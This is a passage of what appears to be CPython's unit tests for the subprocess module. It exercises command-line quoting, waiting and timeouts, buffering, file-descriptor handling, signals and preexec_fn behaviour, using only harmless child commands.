stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = mkstemp()
ofhandle, ofname = mkstemp()
efhandle, efname = mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistant directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
def test_args_string(self):
# args is a string
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
